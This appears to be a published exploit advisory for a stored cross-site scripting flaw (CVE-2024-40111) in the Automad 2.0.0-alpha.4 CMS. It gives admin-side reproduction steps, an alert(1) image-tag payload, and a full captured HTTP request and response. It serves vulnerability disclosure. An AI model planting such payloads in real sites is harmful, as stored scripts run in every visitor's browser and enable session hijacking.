Exploit Title: Stored Cross-Site Scripting (XSS) - Automad 2.0.0-alpha.4

Date: 20-06-2024

CVE: CVE-2024-40111

EDB-ID: 52056

Exploit Author: Jerry Thomas (w3bn00b3r)

Vendor Homepage: https://automad.org

Software Link: https://github.com/marcantondahmen/automad

Category: Web Application [Flat File CMS]

Version: 2.0.0-alpha.4

Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye)

Description

A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the forum. This can result in session hijacking, data theft, and other malicious activities.

Proof-of-Concept

Step-1: Login as Admin & Navigate to the endpoint http://localhost/dashboard/home

Step-2: There will be a default Welcome page. You will find an option to edit it.

Step-3: Navigate to Content tab or http://localhost/dashboard/page?url=%2F&section=text & edit the block named Main

Step-4: Enter the XSS Payload - <img src=x onerror=alert(1)>

Request:

POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"&lt;h1&gt;XSS identified by Jerry&lt;/h1&gt;","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br>&lt;img src=x onerror=alert(1)&gt;<br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

Response:

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30`

{"code":200,"time":1718911055}

Step-5: XSS triggers when you go to homepage - http://localhost/

Video Poc

Link - https://drive.google.com/file/d/10BVQKYo2H1-Nx3FOGteL2xww4lbZ3xlS/view?usp=sharing